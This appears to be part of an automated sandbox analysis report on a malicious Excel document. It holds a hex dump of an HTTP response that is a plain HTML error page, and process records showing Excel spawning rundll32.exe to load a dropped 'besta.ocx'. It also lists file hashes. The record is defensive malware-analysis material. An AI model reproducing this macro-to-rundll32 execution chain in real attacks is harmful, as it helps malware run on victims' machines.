                                                                                                                                                    Dec 2, 2021 07:15:55.497607946 CET5660INData Raw: 31 64 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e
                                                                                                                                                    Data Ascii: 1dc8<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Ex
                                                                                                                                                    Dec 2, 2021 07:15:55.497651100 CET5662INData Raw: 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: eft; word-break: break-all; width: 100%; } .status-reason { font-size: 200%; display: block; color: #CCCCCC; } .reason-text { margin: 20px
                                                                                                                                                    Dec 2, 2021 07:15:55.497687101 CET5663INData Raw: 2f 2f 2f 2f 2f 35 2b 66 6e 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 36 2b 76 72 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f
                                                                                                                                                    Data Ascii: /////5+fn////////////////////////////////6+vr///////////////////////////////////////+i5edTAAAAPXRSTlMAAQECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygoKSorLC0uLzAwMTIzNDU2Nzg5H7x0XAAACndJREFUeAHtXXlzGs8R7TQ3CFkHxpKxhIwtIBwgIuYY4u//uVJ2q
                                                                                                                                                    Dec 2, 2021 07:15:55.497733116 CET5664INData Raw: 71 4a 47 6e 54 7a 73 56 78 4a 6f 51 77 6d 37 62 50 68 51 37 63 7a 61 35 45 43 47 51 47 70 67 36 54 6e 6a 7a 6d 57 42 62 55 37 74 45 78 6b 68 56 77 33 36 79 7a 33 48 43 6d 30 71 45 76 45 5a 39 43 37 76 44 59 5a 65 57 41 51 68 6e 4b 6b 51 55 47 2f
                                                                                                                                                    Data Ascii: qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPex3NaIQLwHIIQlQkPbwsRFpdmdb/hD8TSDCwTBu8W30sSIiS7P9NwZ7CgAeDjlaM9ktAD0+Mxwrs
                                                                                                                                                    Dec 2, 2021 07:15:55.497772932 CET5666INData Raw: 32 6d 42 4e 36 49 32 35 6e 32 43 54 42 4f 4f 52 45 30 2f 36 47 69 56 6e 39 59 4e 66 38 62 46 42 64 34 52 55 52 46 6c 57 7a 42 76 79 42 45 71 49 69 34 49 39 61 6b 79 2b 32 72 32 39 35 39 37 2f 5a 44 36 32 2b 78 4b 56 66 42 74 4e 4d 36 71 61 48 52
                                                                                                                                                    Data Ascii: 2mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL
                                                                                                                                                    Dec 2, 2021 07:15:55.497811079 CET5667INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: } .reason-text { font-size: 160%; } } </style> </head> <body> <div class="container"> <span class="status-reason"> <i class="fas fa-us
                                                                                                                                                    Dec 2, 2021 07:15:55.498986006 CET5667INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    Analysis Process: EXCEL.EXE PID: 6032 Parent PID: 744

                                                                                                                                                    General

                                                                                                                                                    Start time:07:11:28
                                                                                                                                                    Start date:02/12/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                    Imagebase:0xc90000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: rundll32.exe PID: 6072 Parent PID: 6032

                                                                                                                                                    General

                                                                                                                                                    Start time:07:15:55
                                                                                                                                                    Start date:02/12/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2997003472
                                                                                                                                                    Imagebase:0xf50000
                                                                                                                                                    File size:61952 bytes
                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >

                                                                                                                                                      Analysis Process: EXCEL.EXE PID: 6032 Parent PID: 744 EXCEL.EXECOMMON

                                                                                                                                                      Executed Functions

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 1282970F, Relevance: .2, Instructions: 241COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, Offset: 12821000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_3_12821000_EXCEL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ed4526330ead1141ef3112ab1c7c68fdbc52a5f51c60e63cce4ddb0e078f635e
                                                                                                                                                      • Instruction ID: dd911532f01a01088593932fc8c67bea8803bb22f0db11309b57088530a969f4
                                                                                                                                                      • Opcode Fuzzy Hash: ed4526330ead1141ef3112ab1c7c68fdbc52a5f51c60e63cce4ddb0e078f635e
                                                                                                                                                      • Instruction Fuzzy Hash: 5E91C09688E7C25FE30387705C796917FB06E17114B6E86EFC4D9CF4A3E209881AD762
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%